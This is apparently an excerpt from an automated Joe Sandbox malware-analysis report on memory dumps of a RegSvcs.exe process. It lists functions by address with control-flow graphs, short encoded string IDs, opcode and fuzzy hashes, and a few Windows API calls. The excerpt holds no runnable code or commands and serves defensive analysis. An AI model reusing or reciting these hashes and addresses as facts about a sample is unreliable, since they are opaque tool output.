                                                                  control_flow_graph 785 605b6c8-605b6e8 786 605b6ea-605b6ed 785->786 787 605b6ef-605b6f5 786->787 788 605b6fa-605b6fd 786->788 787->788 789 605b6ff-605b705 788->789 790 605b70a-605b70d 788->790 789->790 791 605b717-605b71a 790->791 792 605b70f-605b714 790->792 793 605b724-605b727 791->793 794 605b71c-605b71f 791->794 792->791 795 605b737-605b73a 793->795 796 605b729-605b732 793->796 794->793 797 605b740-605b743 795->797 798 605b9d2-605b9db 795->798 796->795 801 605b745-605b74e 797->801 802 605b753-605b756 797->802 799 605b9e1 798->799 800 605b77e-605b787 798->800 805 605b9e6-605b9e9 799->805 803 605ba64-605ba9e 800->803 804 605b78d-605b794 800->804 801->802 806 605b779-605b77c 802->806 807 605b758-605b75c 802->807 820 605baa0-605baa3 803->820 808 605b799-605b79c 804->808 809 605ba24-605ba27 805->809 810 605b9eb-605ba00 805->810 806->800 806->808 807->803 811 605b762-605b772 807->811 812 605b7b3-605b7b6 808->812 813 605b79e-605b7a2 808->813 815 605ba29-605ba2d 809->815 816 605ba3a-605ba3d 809->816 810->803 830 605ba02-605ba1f 810->830 832 605b7dd-605b7e1 811->832 833 605b774 811->833 818 605b7d8-605b7db 812->818 819 605b7b8-605b7d3 812->819 813->803 817 605b7a8-605b7ae 813->817 815->803 823 605ba2f-605ba35 815->823 824 605ba47-605ba49 816->824 825 605ba3f-605ba42 816->825 817->812 831 605b802-605b805 818->831 818->832 819->818 828 605bd0f-605bd12 820->828 829 605baa9-605bad1 820->829 823->816 826 605ba50-605ba53 824->826 827 605ba4b 824->827 825->824 826->786 836 605ba59-605ba63 826->836 827->826 838 605bd35-605bd37 828->838 839 605bd14-605bd30 828->839 883 605bad3-605bad6 829->883 884 605badb-605bb1f 829->884 830->809 834 605b807-605b810 831->834 835 605b81b-605b81e 831->835 832->803 840 605b7e7-605b7f7 832->840 833->806 841 605b816 834->841 842 605b9a2-605b9ab 834->842 843 605b870-605b873 835->843 844 605b820-605b86b call 6056618 835->844 847 605bd3e-605bd41 838->847 848 605bd39 838->848 839->838 861 605b7fd 840->861 862 605b978-605b97c 840->862 841->835 842->803 853 605b9b1-605b9b8 842->853 849 605b875-605b891 843->849 850 605b896-605b899 843->850 844->843 847->820 855 605bd47-605bd50 847->855 848->847 849->850 857 605b8b0-605b8b3 850->857 858 605b89b-605b89f 850->858 860 605b9bd-605b9c0 853->860 870 605b8b5-605b8bc 857->870 871 605b8c7-605b8ca 857->871 858->803 868 605b8a5-605b8ab 858->868 863 605b9c2-605b9c8 860->863 864 605b9cd-605b9d0 860->864 861->831 862->803 867 605b982-605b992 862->867 863->864 864->798 864->805 867->825 890 605b998 867->890 868->857 875 605b953-605b959 870->875 876 605b8c2 870->876 872 605b8dc-605b8df 871->872 873 605b8cc-605b8d7 871->873 879 605b8e1-605b8f6 872->879 880 605b91d-605b920 872->880 873->872 878 605b95e-605b961 875->878 876->871 886 605b973-605b976 878->886 887 605b963 878->887 879->803 896 605b8fc-605b918 879->896 880->825 889 605b926-605b929 880->889 883->855 907 605bb25-605bb2e 884->907 908 605bd04-605bd0e 884->908 886->862 893 605b99d-605b9a0 886->893 895 605b96b-605b96e 887->895 889->825 894 605b92f-605b932 889->894 890->893 893->842 893->860 894->834 898 605b938-605b93b 894->898 895->886 896->880 898->825 900 605b941-605b944 898->900 903 605b946-605b94b 900->903 904 605b94e-605b951 900->904 903->904 904->875 904->878 909 605bb34-605bba0 call 6056618 907->909 910 605bcfa-605bcff 907->910 919 605bba6-605bbab 909->919 920 605bc9a-605bcaf 909->920 910->908 921 605bbc7 919->921 922 605bbad-605bbb3 919->922 920->910 926 605bbc9-605bbcf 921->926 924 605bbb5-605bbb7 922->924 925 605bbb9-605bbbb 922->925 927 605bbc5 924->927 925->927 928 605bbe4-605bbf1 926->928 929 605bbd1-605bbd7 926->929 927->926 935 605bbf3-605bbf9 928->935 936 605bc09-605bc16 928->936 930 605bc85-605bc94 929->930 931 605bbdd 929->931 930->919 930->920 931->928 932 605bc4c-605bc59 931->932 933 605bc18-605bc25 931->933 942 605bc71-605bc7e 932->942 943 605bc5b-605bc61 932->943 945 605bc27-605bc2d 933->945 946 605bc3d-605bc4a 933->946 938 605bbfd-605bbff 935->938 939 605bbfb 935->939 936->930 938->936 939->936 942->930 947 605bc65-605bc67 943->947 948 605bc63 943->948 949 605bc31-605bc33 945->949 950 605bc2f 945->950 946->930 947->942 948->942 949->946 950->946
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 16878924feff703337a4cd93feae867c3a119480e0582a5dde0cb60d07673ceb
                                                                  • Instruction ID: 6d200fa583391e10725b09cf59a3bbc7e4077b095be1de16c65e34f9debe57a1
                                                                  • Opcode Fuzzy Hash: 16878924feff703337a4cd93feae867c3a119480e0582a5dde0cb60d07673ceb
                                                                  • Instruction Fuzzy Hash: D1029D30E402098FDBA4DF68D5A06AEBBF1FF45310F21892AD805DB255DB74ED85CB91
                                                                  Function 060591C0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 953 60591c0-60591e5 954 60591e7-60591ea 953->954 955 6059210-6059213 954->955 956 60591ec-605920b 954->956 957 6059ad3-6059ad5 955->957 958 6059219-605922e 955->958 956->955 959 6059ad7 957->959 960 6059adc-6059adf 957->960 964 6059246-605925c 958->964 965 6059230-6059236 958->965 959->960 960->954 963 6059ae5-6059aef 960->963 970 6059267-6059269 964->970 967 6059238 965->967 968 605923a-605923c 965->968 967->964 968->964 971 6059281-60592f2 970->971 972 605926b-6059271 970->972 983 60592f4-6059317 971->983 984 605931e-605933a 971->984 973 6059275-6059277 972->973 974 6059273 972->974 973->971 974->971 983->984 989 6059366-6059381 984->989 990 605933c-605935f 984->990 995 6059383-60593a5 989->995 996 60593ac-60593c7 989->996 990->989 995->996 1001 60593f2-60593fc 996->1001 1002 60593c9-60593eb 996->1002 1003 605940c-6059486 1001->1003 1004 60593fe-6059407 1001->1004 1002->1001 1010 60594d3-60594e8 1003->1010 1011 6059488-60594a6 1003->1011 1004->963 1010->957 1015 60594c2-60594d1 1011->1015 1016 60594a8-60594b7 1011->1016 1015->1010 1015->1011 1016->1015
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 81b434781613a7e914e9756865932855dfec89075df23f50f20d037f79f5bb1d
                                                                  • Instruction ID: 7b395cd69dfb93f151d2d465e8593f6cfcd4aa97c081b345664b9dbbbdb3a1af
                                                                  • Opcode Fuzzy Hash: 81b434781613a7e914e9756865932855dfec89075df23f50f20d037f79f5bb1d
                                                                  • Instruction Fuzzy Hash: A7918030F4020A8FDF94DB69D950BAF77F6EF84200F108569D809EB358EA749D468B90
                                                                  Function 0605CFB8 Relevance: 4.5, Strings: 3, Instructions: 799COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1019 605cfb8-605cfd3 1020 605cfd5-605cfd8 1019->1020 1021 605d4a4-605d4b0 1020->1021 1022 605cfde-605cfe1 1020->1022 1025 605d4b6-605d7a3 1021->1025 1026 605d26e-605d27d 1021->1026 1023 605cff0-605cff3 1022->1023 1024 605cfe3-605cfe5 1022->1024 1027 605cff5-605cff7 1023->1027 1028 605d002-605d005 1023->1028 1031 605d4a1 1024->1031 1032 605cfeb 1024->1032 1231 605d7a9-605d7af 1025->1231 1232 605d9ca-605d9d4 1025->1232 1029 605d28c-605d298 1026->1029 1030 605d27f-605d284 1026->1030 1034 605cffd 1027->1034 1035 605d35f-605d368 1027->1035 1036 605d007-605d049 1028->1036 1037 605d04e-605d051 1028->1037 1038 605d9d5-605da0e 1029->1038 1039 605d29e-605d2b0 1029->1039 1030->1029 1031->1021 1032->1023 1034->1028 1042 605d377-605d383 1035->1042 1043 605d36a-605d36f 1035->1043 1036->1037 1040 605d053-605d095 1037->1040 1041 605d09a-605d09d 1037->1041 1053 605da10-605da13 1038->1053 1056 605d2b5-605d2b8 1039->1056 1040->1041 1050 605d0e6-605d0e9 1041->1050 1051 605d09f-605d0e1 1041->1051 1047 605d494-605d499 1042->1047 1048 605d389-605d39d 1042->1048 1043->1042 1047->1031 1048->1031 1071 605d3a3-605d3b5 1048->1071 1054 605d132-605d135 1050->1054 1055 605d0eb-605d12d 1050->1055 1051->1050 1061 605da15-605da41 1053->1061 1062 605da46-605da49 1053->1062 1058 605d137-605d14d 1054->1058 1059 605d152-605d155 1054->1059 1055->1054 1065 605d301-605d304 1056->1065 1066 605d2ba-605d2fc 1056->1066 1058->1059 1075 605d157-605d15c 1059->1075 1076 605d15f-605d162 1059->1076 1061->1062 1068 605da58-605da5b 1062->1068 1069 605da4b call 605db2d 1062->1069 1073 605d306-605d348 1065->1073 1074 605d34d-605d34f 1065->1074 1066->1065 1081 605da5d-605da79 1068->1081 1082 605da7e-605da80 1068->1082 1090 605da51-605da53 1069->1090 1103 605d3b7-605d3bd 1071->1103 1104 605d3d9-605d3db 1071->1104 1073->1074 1078 605d356-605d359 1074->1078 1079 605d351 1074->1079 1075->1076 1086 605d164-605d173 1076->1086 1087 605d1ab-605d1ae 1076->1087 1078->1020 1078->1035 1079->1078 1081->1082 1093 605da87-605da8a 1082->1093 1094 605da82 1082->1094 1097 605d175-605d17a 1086->1097 1098 605d182-605d18e 1086->1098 1088 605d1f7-605d1fa 1087->1088 1089 605d1b0-605d1f2 1087->1089 1106 605d243-605d246 1088->1106 1107 605d1fc-605d23e 1088->1107 1089->1088 1090->1068 1093->1053 1108 605da8c-605da9b 1093->1108 1094->1093 1097->1098 1098->1038 1099 605d194-605d1a6 1098->1099 1099->1087 1114 605d3c1-605d3cd 1103->1114 1115 605d3bf 1103->1115 1112 605d3e5-605d3f1 1104->1112 1118 605d269-605d26c 1106->1118 1119 605d248-605d264 1106->1119 1107->1106 1133 605db02-605db17 1108->1133 1134 605da9d-605db00 call 6056618 1108->1134 1143 605d3f3-605d3fd 1112->1143 1144 605d3ff 1112->1144 1124 605d3cf-605d3d7 1114->1124 1115->1124 1118->1026 1118->1056 1119->1118 1124->1112 1134->1133 1148 605d404-605d406 1143->1148 1144->1148 1148->1031 1154 605d40c-605d428 call 6056618 1148->1154 1169 605d437-605d443 1154->1169 1170 605d42a-605d42f 1154->1170 1169->1047 1172 605d445-605d492 1169->1172 1170->1169 1172->1031 1233 605d7b1-605d7b6 1231->1233 1234 605d7be-605d7c7 1231->1234 1233->1234 1234->1038 1235 605d7cd-605d7e0 1234->1235 1237 605d7e6-605d7ec 1235->1237 1238 605d9ba-605d9c4 1235->1238 1239 605d7ee-605d7f3 1237->1239 1240 605d7fb-605d804 1237->1240 1238->1231 1238->1232 1239->1240 1240->1038 1241 605d80a-605d82b 1240->1241 1244 605d82d-605d832 1241->1244 1245 605d83a-605d843 1241->1245 1244->1245 1245->1038 1246 605d849-605d866 1245->1246 1246->1238 1249 605d86c-605d872 1246->1249 1249->1038 1250 605d878-605d891 1249->1250 1252 605d897-605d8be 1250->1252 1253 605d9ad-605d9b4 1250->1253 1252->1038 1256 605d8c4-605d8ce 1252->1256 1253->1238 1253->1249 1256->1038 1257 605d8d4-605d8eb 1256->1257 1259 605d8ed-605d8f8 1257->1259 1260 605d8fa-605d915 1257->1260 1259->1260 1260->1253 1265 605d91b-605d934 call 6056618 1260->1265 1269 605d936-605d93b 1265->1269 1270 605d943-605d94c 1265->1270 1269->1270 1270->1038 1271 605d952-605d9a6 1270->1271 1271->1253
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq
                                                                  • API String ID: 0-3696375380
                                                                  • Opcode ID: 134bd9332da8c56784627cfb9729cb1f955d8840e31305dd728ef5a3b424480f
                                                                  • Instruction ID: 9a5f8aabc8ece9c7fe99420452045ee631d8146e60538df29f9c8704d4634d56
                                                                  • Opcode Fuzzy Hash: 134bd9332da8c56784627cfb9729cb1f955d8840e31305dd728ef5a3b424480f
                                                                  • Instruction Fuzzy Hash: C1624E30A402098FCB55EF68E590A5EB7F6FF84300B218A69D4059F369EB75ED46CF81
                                                                  Function 06054C10 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1279 6054c10-6054c34 1280 6054c36-6054c39 1279->1280 1281 6054c3b-6054c55 1280->1281 1282 6054c5a-6054c5d 1280->1282 1281->1282 1283 6054c63-6054d5b 1282->1283 1284 605533c-605533e 1282->1284 1302 6054d61-6054dae call 60554b8 1283->1302 1303 6054dde-6054de5 1283->1303 1286 6055345-6055348 1284->1286 1287 6055340 1284->1287 1286->1280 1289 605534e-605535b 1286->1289 1287->1286 1316 6054db4-6054dd0 1302->1316 1304 6054e69-6054e72 1303->1304 1305 6054deb-6054e5b 1303->1305 1304->1289 1322 6054e66 1305->1322 1323 6054e5d 1305->1323 1319 6054dd2 1316->1319 1320 6054ddb-6054ddc 1316->1320 1319->1320 1320->1303 1322->1304 1323->1322
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: foq$XPoq$\Ooq
                                                                  • API String ID: 0-3137531485
                                                                  • Opcode ID: 55ae2ba98387f8e03badf3bd910bab8c63e46a979bef507734d3387d501e7c22
                                                                  • Instruction ID: 7debc1d9c409aab6872f9a4bb99ded340a297bd33e43db4044ab173f3baffe90
                                                                  • Opcode Fuzzy Hash: 55ae2ba98387f8e03badf3bd910bab8c63e46a979bef507734d3387d501e7c22
                                                                  • Instruction Fuzzy Hash: 1F616230E002089FEF549BA9C855BAEBBF6FF88300F208529E505AB395DF758D458B51
                                                                  Function 060591B3 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2210 60591b3-60591e5 2212 60591e7-60591ea 2210->2212 2213 6059210-6059213 2212->2213 2214 60591ec-605920b 2212->2214 2215 6059ad3-6059ad5 2213->2215 2216 6059219-605922e 2213->2216 2214->2213 2217 6059ad7 2215->2217 2218 6059adc-6059adf 2215->2218 2222 6059246-605925c 2216->2222 2223 6059230-6059236 2216->2223 2217->2218 2218->2212 2221 6059ae5-6059aef 2218->2221 2228 6059267-6059269 2222->2228 2225 6059238 2223->2225 2226 605923a-605923c 2223->2226 2225->2222 2226->2222 2229 6059281-60592f2 2228->2229 2230 605926b-6059271 2228->2230 2241 60592f4-6059317 2229->2241 2242 605931e-605933a 2229->2242 2231 6059275-6059277 2230->2231 2232 6059273 2230->2232 2231->2229 2232->2229 2241->2242 2247 6059366-6059381 2242->2247 2248 605933c-605935f 2242->2248 2253 6059383-60593a5 2247->2253 2254 60593ac-60593c7 2247->2254 2248->2247 2253->2254 2259 60593f2-60593fc 2254->2259 2260 60593c9-60593eb 2254->2260 2261 605940c-6059486 2259->2261 2262 60593fe-6059407 2259->2262 2260->2259 2268 60594d3-60594e8 2261->2268 2269 6059488-60594a6 2261->2269 2262->2221 2268->2215 2273 60594c2-60594d1 2269->2273 2274 60594a8-60594b7 2269->2274 2273->2268 2273->2269 2274->2273
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq
                                                                  • API String ID: 0-3720491408
                                                                  • Opcode ID: 3139802e25188a311701ad86a2de03134df56991bcb185abc3a2aa865480af7b
                                                                  • Instruction ID: a831d9d725da7e9637adc3b8d698362e4b42c6e5d9fa9dec3994e8a1cc67e484
                                                                  • Opcode Fuzzy Hash: 3139802e25188a311701ad86a2de03134df56991bcb185abc3a2aa865480af7b
                                                                  • Instruction Fuzzy Hash: 5C517031B001458FDF95EB68D990B6F77F6EF88200F108569D809EB398EA74EC46CB91
                                                                  Function 06054C00 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2277 6054c00-6054c34 2279 6054c36-6054c39 2277->2279 2280 6054c3b-6054c55 2279->2280 2281 6054c5a-6054c5d 2279->2281 2280->2281 2282 6054c63-6054d5b 2281->2282 2283 605533c-605533e 2281->2283 2301 6054d61-6054dae call 60554b8 2282->2301 2302 6054dde-6054de5 2282->2302 2285 6055345-6055348 2283->2285 2286 6055340 2283->2286 2285->2279 2288 605534e-605535b 2285->2288 2286->2285 2315 6054db4-6054dd0 2301->2315 2303 6054e69-6054e72 2302->2303 2304 6054deb-6054e5b 2302->2304 2303->2288 2321 6054e66 2304->2321 2322 6054e5d 2304->2322 2318 6054dd2 2315->2318 2319 6054ddb-6054ddc 2315->2319 2318->2319 2319->2302 2321->2303 2322->2321
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: foq$XPoq
                                                                  • API String ID: 0-1558145954
                                                                  • Opcode ID: f572c2d4739daa6d9fca33507cf8af4d2af053be3c19c5f0c207d50460fb4db5
                                                                  • Instruction ID: 7b45206faa9d751f7a7fd7577ccd2993536aec67b948c22acc7aca91fb78ab18
                                                                  • Opcode Fuzzy Hash: f572c2d4739daa6d9fca33507cf8af4d2af053be3c19c5f0c207d50460fb4db5
                                                                  • Instruction Fuzzy Hash: 8E517171F002089FEB549FA9C815BAEBBF6FF88700F208529E505EB395DA758C418B91
                                                                  Function 0604B328 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 6049e545582b4058f0ec23a6187b86e8cfab80d050a881dbd8311619e63e5943
                                                                  • Instruction ID: 1b85e7d9997ad49f7c896fb53c9f6a10ea3d736c6d9753e7c2096b620a44ed98
                                                                  • Opcode Fuzzy Hash: 6049e545582b4058f0ec23a6187b86e8cfab80d050a881dbd8311619e63e5943
                                                                  • Instruction Fuzzy Hash: B88144B0A00B059FD7B4EF2AD44575ABBF5FF88304F008A2AD48AD7A50DB35E945CB91
                                                                  Function 0604D504 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D622
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 564d8c094d965ec869cf77ef26017f5475fa60893d41b103f9f408dfe65183db
                                                                  • Instruction ID: 1038372efac9222f0ce02915d09bc9547ff2a9bfd53194ec9b3ad3a9a35a71ca
                                                                  • Opcode Fuzzy Hash: 564d8c094d965ec869cf77ef26017f5475fa60893d41b103f9f408dfe65183db
                                                                  • Instruction Fuzzy Hash: 2851CDB1D003499FDB64DF99C984ADEBFB5FF48310F24852AE819AB250D775A881CF90
                                                                  Function 0604D510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D622
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 999189cee8a2f879594f3d9c0ed53c1587d583163b7af6221c581b9c6fd54dd6
                                                                  • Instruction ID: 972b7a31c33429a43ed1850711876652d902c718f1baedf14ac12d7de950a158
                                                                  • Opcode Fuzzy Hash: 999189cee8a2f879594f3d9c0ed53c1587d583163b7af6221c581b9c6fd54dd6
                                                                  • Instruction Fuzzy Hash: 9F41AEB1D003499FDB24DF99C984ADEBFB5FF48310F24852AE819AB250D775A885CF90
                                                                  Function 0604E49C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0604FD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 5e1dd0d852f01adfc73d7702ace7638be5325d567c9bebac0ed4c78a9e677479
                                                                  • Instruction ID: e95a2e349a76b9a0baf05ebd8e725f679caa0988c9cc49bc478b386e0df7ca53
                                                                  • Opcode Fuzzy Hash: 5e1dd0d852f01adfc73d7702ace7638be5325d567c9bebac0ed4c78a9e677479
                                                                  • Instruction Fuzzy Hash: 084139B4A00205DFDB54DF99C548AAABBF5FF88310F24C859E519AB321C375A841CFA0
                                                                  Function 06043048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060430D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 33e7a160dc8262fbc434ce0663fb044f28c2926e17966b3b766a3033b5486e60
                                                                  • Instruction ID: 55c688ec4a35b0b8761ffc836d236d63aef6a0f1f56ec866271d5ef13548ab21
                                                                  • Opcode Fuzzy Hash: 33e7a160dc8262fbc434ce0663fb044f28c2926e17966b3b766a3033b5486e60
                                                                  • Instruction Fuzzy Hash: EE21E3B5D002589FDB10CF9AD984AEEBFF5EB48310F14842AE919A7350D379A940CFA1
                                                                  Function 06043050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060430D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 2d9dfa9f55f01e7b27fafecbda54453fdad6eef23b647c700ef3aeb6cbe9a572
                                                                  • Instruction ID: 319589a41dfea4250596de3768e2f4f57807c3d96cd78823000f86e9c99388a7
                                                                  • Opcode Fuzzy Hash: 2d9dfa9f55f01e7b27fafecbda54453fdad6eef23b647c700ef3aeb6cbe9a572
                                                                  • Instruction Fuzzy Hash: F021C4B59002489FDB10DF9AD984ADEFFF9FB48310F14841AE918A3350D379A944CFA5
                                                                  Function 0097EBF0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0097EC5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 63af09f42c68e8ad05dcf4f988e957397955f94f5986c91cbcabc86d09a42638
                                                                  • Instruction ID: 246dbc80a6309dc9dde16a6966401f4533628731b0c9dcc8106fe341a2e38e93
                                                                  • Opcode Fuzzy Hash: 63af09f42c68e8ad05dcf4f988e957397955f94f5986c91cbcabc86d09a42638
                                                                  • Instruction Fuzzy Hash: 651114B6C006599BCB10DF9AC5447DEFBF4FF48320F14816AE918A7240D778A941CFA5
                                                                  Function 0097EBF8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0097EC5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 55fc6624f18353732cc8fd2e617365768c84d7dc3c2850f9076c398d2b5a8892
                                                                  • Instruction ID: d149d58702e8ce38eadcf2d1bf5fcd60b4ea08dccc2347255222c204a284d717
                                                                  • Opcode Fuzzy Hash: 55fc6624f18353732cc8fd2e617365768c84d7dc3c2850f9076c398d2b5a8892
                                                                  • Instruction Fuzzy Hash: A911E2B1C006599BCB10DF9AC544B9EFBF4EF49320F14816AD918A7240D778A944CFA5
                                                                  Function 0604A28C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0604B344), ref: 0604B57E
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 9c82a38f253369a667e0d9a0e253a5b93aace79dad04a86e9a579a4a7d0bdf08
                                                                  • Instruction ID: 9088651cf715c141aef9ecd1b1491e021ff7264b879d242e35613aac351e6b5f
                                                                  • Opcode Fuzzy Hash: 9c82a38f253369a667e0d9a0e253a5b93aace79dad04a86e9a579a4a7d0bdf08
                                                                  • Instruction Fuzzy Hash: D51102B5C007498FDB20EFAAC444B9EFBF4EB49310F14842AD419B7210D379A545CFA1
                                                                  Function 0605DB2D Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHjq
                                                                  • API String ID: 0-751881793
